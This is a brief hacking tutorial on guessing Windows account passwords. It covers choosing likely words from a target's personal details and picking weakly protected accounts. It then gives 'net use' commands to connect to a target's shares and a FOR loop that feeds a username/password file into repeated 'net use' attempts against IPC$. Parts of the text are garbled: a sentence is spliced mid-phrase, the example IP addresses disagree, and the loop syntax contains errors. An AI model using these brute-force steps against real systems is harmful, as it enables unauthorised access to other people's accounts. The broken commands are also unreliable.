Methodology To Guess A Password

 

Many users use easy to remember words when considering a password. This can be a advantage for a  hacker when he looks for subtle clues. The hacker keys in probable words that the account holder might have used throughout the enumeration process. The key points to consider are the know about the individual such as, the character, personal details, character of the individual and other aspects such as hobbies and special moments of the individual. If the account holder is an unknown person focus on accounts that are : 

• With the same password for a long time
• Weakly protected service accounts
• Poorly shared accounts
• Indicate the user has never logged in
• Have information in the comment field that might be used to compromise password security.
  If such an account is being identified, the net use command can be used from the command line to connect
  

  Net use * \\target_IP\share * /u:name

  Next you would be prompted for a password to complete the authentication 

  C:\>net use * \\192.188.13.10\c$ * /u:killerifthy
  Type the password for \\172.20.10.79\c$:
  The command completed successfully

  The process is not easy as you have to try the process many times or oven consider looping the process. To perform an automated password guess a simple loop can be constructed using  It's not always that easy, so you might have to try multiple times or even consider looping the process.NT/2000/XP shell. It is based on the standard NET USE syntax. Below are the steps to follow

  1. Create a simple username and password file.
  2. Inject the file in to the FOR command mentioned below  

  C:\> FOR /F "token=1, 2*" %i in (kilerhack.txt)
     do net use \\target\IPC$ %i /u: %j

  Note 

  Make sure that you identify if there is a password lockout policy. Otherwise, you might inadvertently cause a denial of service (DoS) if you lock out all the users.